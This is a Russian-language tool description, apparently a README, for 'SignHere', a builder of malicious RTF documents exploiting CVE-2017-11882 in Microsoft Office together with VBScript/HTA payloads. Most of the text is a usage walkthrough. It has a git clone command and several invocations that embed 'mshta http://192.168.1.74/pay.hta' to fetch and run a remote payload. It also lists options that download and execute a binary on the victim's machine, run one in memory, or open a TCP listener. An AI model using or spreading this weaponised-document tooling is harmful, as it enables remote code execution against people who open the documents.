
SignHere — реализация CVE-2017-11882. SignHere — конструктор вредоносных RTF-документов и VBScript-пейлоадов.
CVE-2017-11882 — уникальный идентификатор уязвимости Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1 и Microsoft Office 2016, позволяющий злоумышленнику выполнять код в контексте текущего пользователя при неправильной обработке объектов в памяти, так называемая «Уязвимость повреждения памяти Microsoft Office». Реализация включает создание программы для построения вредоносных rtf-документов и полезных нагрузок на VBScript
Именно rtf-документы уязвимы, поскольку их можно «программировать», зная специальные команды — заголовки RTF. Таким образом, в теле документа создается двоичный (исполняемый) объект, по сути, это формула Microsoft Equation с кодом, содержащим команду cmd. Затем вы можете сгенерировать полезную нагрузку на VBScript и использовать команду «mshta ссылка на файл полезной нагрузки» для выполнения hta-файла.
Автор и участники не несут ответственности за любой ущерб, причиненный вам или вами.
Вы можете использовать Termux, но выполнение программы требует root
git clone https://github.com/Retr0-code/SignHere/
cd SignHere/
chmod +x SignHere.py
./SignHere.py --help
Сначала нужно скачать архив. Затем распаковать его и открыть окно PowerShell в этой папке и написать:
.\SignHere.py --help
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --powershell "start iexplore.exe https://github.com/Retr0-code/SignHere" --ip 192.168.1.74 --output generated.rtf
--cmd Аргумент с командой Windows, которая будет выполнена после открытия документа.
--powershell Аргумент с командой PowerShell, которая будет в полезной нагрузке VBScript.
--ip Аргумент с IP-адресом, который будет использоваться для веб-сервера. (по умолчанию: 127.0.0.1)
--output Имя и путь документа.
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --temp exploit.exe --ip 192.168.1.74 --output generated.rtf
--temp Аргумент, который будет использовать двоичный файл в качестве полезной нагрузки (двоичный файл будет запущен в оперативной памяти).
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --payload exploit.exe --ip 192.168.1.74 --listener-host 192.168.1.74 --output generated.rtf
--payload Аргумент, который загрузит файл на компьютер жертвы и выполнит его.
--listener-host Аргумент для запуска TCP-прослушивателя на текущем IP (по умолчанию: 127.0.0.1)